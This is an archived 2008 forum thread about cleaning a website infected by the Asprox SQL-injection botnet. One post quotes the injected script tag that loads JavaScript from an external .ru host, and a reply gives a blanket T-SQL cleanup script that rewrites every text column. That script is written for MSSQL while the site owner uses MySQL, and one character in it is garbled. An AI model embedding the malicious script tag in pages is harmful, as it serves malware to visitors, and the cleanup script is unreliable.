How to get out malware from website

Reply

Join Date: Jan 2007
Posts: 3,210
Reputation: MidiMagic has a spectacular aura about MidiMagic has a spectacular aura about 
Solved Threads: 164
MidiMagic's Avatar
MidiMagic MidiMagic is offline Offline
Nearly a Senior Poster

Re: How to get out malware from website

 
0
  #11
Aug 14th, 2008
Report it to the ISP administrator.

If the ISP won't or can't stop it, change ISP services.
Daylight-saving time uses more gasoline
Reply With Quote Quick reply to this message  
Join Date: Aug 2008
Posts: 37
Reputation: 123468743867143 is an unknown quantity at this point 
Solved Threads: 0
123468743867143's Avatar
123468743867143 123468743867143 is offline Offline
Light Poster

Answer: How to get out malware from website

 
0
  #12
Aug 24th, 2008
(<script src=http://www.uhwc.ru/js.js></script>)

Hi,
I have had the same problem and was even tagged by Google.

The only way to do it is open your entire web site (I mean all of the files) in whatever software you use, do a search and replace. Change all of your passwords (Server, database, email, etc ...).

Mine has not come back since.

My problem started around Mid August 2008 ... Is Godaddy you hosting company by any chance?
Reply With Quote Quick reply to this message  
Join Date: Jul 2004
Posts: 95
Reputation: omol is an unknown quantity at this point 
Solved Threads: 4
omol's Avatar
omol omol is offline Offline
Junior Poster in Training

Re: How to get out malware from website

 
0
  #13
Aug 26th, 2008
You have a form on your website that has been exploited. It's part of a very big botnet that automatically finds vunribiltys for asp and injects source into one of your fields. Fix the problem with correct error checking and then edit your database and remove the javascript links.

If you want to find out more infomation about this botnet it's been given the alias asprox.
asm
{ "\x04f\x06d\x06f\x06c" }
Reply With Quote Quick reply to this message  
Join Date: Aug 2008
Posts: 37
Reputation: 123468743867143 is an unknown quantity at this point 
Solved Threads: 0
123468743867143's Avatar
123468743867143 123468743867143 is offline Offline
Light Poster

Re: How to get out malware from website

 
0
  #14
Aug 26th, 2008
I am looking into it right now. I thought my problem was over with. This is scary. I have had inconsistent behavior from MySQL and your input might help me pint point the issue. Thank you.
Reply With Quote Quick reply to this message  
Join Date: Jul 2004
Posts: 95
Reputation: omol is an unknown quantity at this point 
Solved Threads: 4
omol's Avatar
omol omol is offline Offline
Junior Poster in Training

Re: How to get out malware from website

 
0
  #15
Aug 26th, 2008
Good luck, if you get stuck let me know and i will help further.
asm
{ "\x04f\x06d\x06f\x06c" }
Reply With Quote Quick reply to this message  
Join Date: Aug 2008
Posts: 37
Reputation: 123468743867143 is an unknown quantity at this point 
Solved Threads: 0
123468743867143's Avatar
123468743867143 123468743867143 is offline Offline
Light Poster

Re: How to get out malware from website

 
0
  #16
Aug 26th, 2008
Hi Omol,

Since you asked ... I have been looking into my db (not very good at it though) ... what exactly am I looking for? In the web pages, it was easy to find the intrusive url and delete. What do I search for? I tried asprox, ect ... nothing found.

Thank you.

Rachel
Reply With Quote Quick reply to this message  
Join Date: Jul 2004
Posts: 95
Reputation: omol is an unknown quantity at this point 
Solved Threads: 4
omol's Avatar
omol omol is offline Offline
Junior Poster in Training

Re: How to get out malware from website

 
0
  #17
Aug 26th, 2008
I would start with the string "js.js". What database tech are you using? MsSql?

Ok i have found some good metrial now.

http://www.networkcloaking.com/ASPROX_Toolkit.pdf
Last edited by omol; Aug 26th, 2008 at 12:55 pm. Reason: Found some info on removal. Too fast for my edit.
asm
{ "\x04f\x06d\x06f\x06c" }
Reply With Quote Quick reply to this message  
Join Date: Aug 2008
Posts: 37
Reputation: 123468743867143 is an unknown quantity at this point 
Solved Threads: 0
123468743867143's Avatar
123468743867143 123468743867143 is offline Offline
Light Poster

Re: How to get out malware from website

 
0
  #18
Aug 26th, 2008
Yes, MySQL. I looked for js.js. in db, not there.

I did remove js.js from the website pages a while back. I checked again, it has not come back.

Something is making my database inconsistent ... Users able to register a new listing one minute but not the other (while the database is still taking their info but not publishing it back to the site).
Last edited by 123468743867143; Aug 26th, 2008 at 12:51 pm.
Reply With Quote Quick reply to this message  
Join Date: Jul 2004
Posts: 95
Reputation: omol is an unknown quantity at this point 
Solved Threads: 4
omol's Avatar
omol omol is offline Offline
Junior Poster in Training

Re: How to get out malware from website

 
0
  #19
Aug 26th, 2008
Sorry i should not edit posts.

Heres the fix. Replace infected_table with the table name that is infected on your site.

HTML and CSS Syntax (Toggle Plain Text)
  1. use <infected_table>
  2. DECLARE @T varchar(255), @C varchar(255);
  3. DECLARE Table_Cursor CURSOR FOR
  4. SELECT a.name, b.name
  5. FROM sysobjects a, syscolumns b
  6. WHERE a.id = b.id AND a.xtype = 'u' AND
  7. (b.xtype = 99 OR
  8. b.xtype = 35 OR
  9. b.xtype = 231 OR
  10. b.xtype = 167);
  11. OPEN Table_Cursor;
  12. FETCH NEXT FROM Table_Cursor INTO @T, @C;
  13. WHILE (@@FETCH_STATUS = 0) BEGIN
  14. EXEC(
  15. 'update ['+@T+'] set ['+@C+'] = left(
  16. convert(varchar(8000), ['+@C+']),
  17. len(convert(varchar(8000), ['+@C+'])) - 6 –
  18. patindex(''%tpircs<%'',
  19. reverse(convert(varchar(8000), ['+@C+'])))
  20. )
  21. where ['+@C+'] like ''%<script%</script>'''
  22. );
  23. FETCH NEXT FROM Table_Cursor INTO @T, @C;
  24. END;
  25. CLOSE Table_Cursor;
  26. DEALLOCATE Table_Cursor;

If you need to know more, or want more infomation have a look at.

http://www.networkcloaking.com/ASPROX_Toolkit.pdf
asm
{ "\x04f\x06d\x06f\x06c" }
Reply With Quote Quick reply to this message  
Join Date: Aug 2008
Posts: 37
Reputation: 123468743867143 is an unknown quantity at this point 
Solved Threads: 0
123468743867143's Avatar
123468743867143 123468743867143 is offline Offline
Light Poster

Re: How to get out malware from website

 
0
  #20
Aug 26th, 2008
Thank you very much. you are great.
Reply With Quote Quick reply to this message  
Reply

This thread is more than three months old.
Perhaps start a new thread instead?
Message:



Similar Threads
Other Threads in the HTML and CSS Forum
Thread Tools Search this Thread



About Us | Contact Us | Advertise | DaniWeb | Acceptable Use Policy | RSS Feed

©2003 - 2009 DaniWeb® LLC